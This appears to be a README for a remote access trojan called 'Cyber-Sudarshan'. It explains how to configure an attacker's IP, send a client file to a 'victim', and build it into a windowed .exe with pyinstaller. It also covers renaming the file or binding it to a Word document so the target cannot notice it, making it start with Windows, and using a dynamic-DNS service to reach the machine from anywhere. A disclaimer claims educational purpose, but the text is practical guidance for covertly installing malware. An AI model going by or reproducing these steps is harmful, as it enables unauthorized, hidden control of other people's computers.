"# Cyber-Sudarshan"
firstly you need python 3 bot pc victim or hacker pc
type command "pip install -r requirements.txt" all requier module install automaticaly
must change ip address in server.py or client.py change ip address and put your ip address
run server.py file in your pc
send client.py file and run it
now you can see the all option in server.py file and you can select any option's
"--l" list all connected user sleect user
"--i 0" now you can access victim pc using server.py file
so you can also conver client.py file in .exe file than you have to change log or rename it's and send victime pc and only triger it, than it's automaticaly active and you can also binde with any file like word file or somethig which user can't understan which file is running in background or one time client.py/client.exe file active you haver to only set as a windows stater file means whenever victim start PC so automaticaly our file is run and send the simel to hacker
any if you want to convert your .py file into .exe fier this command """ pyinstaller client.py --exclude-module FixTk --exclude-module tcl --exclude-module tk --exclude-module _tkinter --exclude-module tkinter --exclude-module Tkinter --onefile --windowed """
or it is only work in same network if you want to used out side of network you have to used "NOip" means you have to conver your dynamic ip as static ip menas client file find your ip and redirect as your ip and you can access client PC any where any time
Don't Misuse its Only For Educational Purpose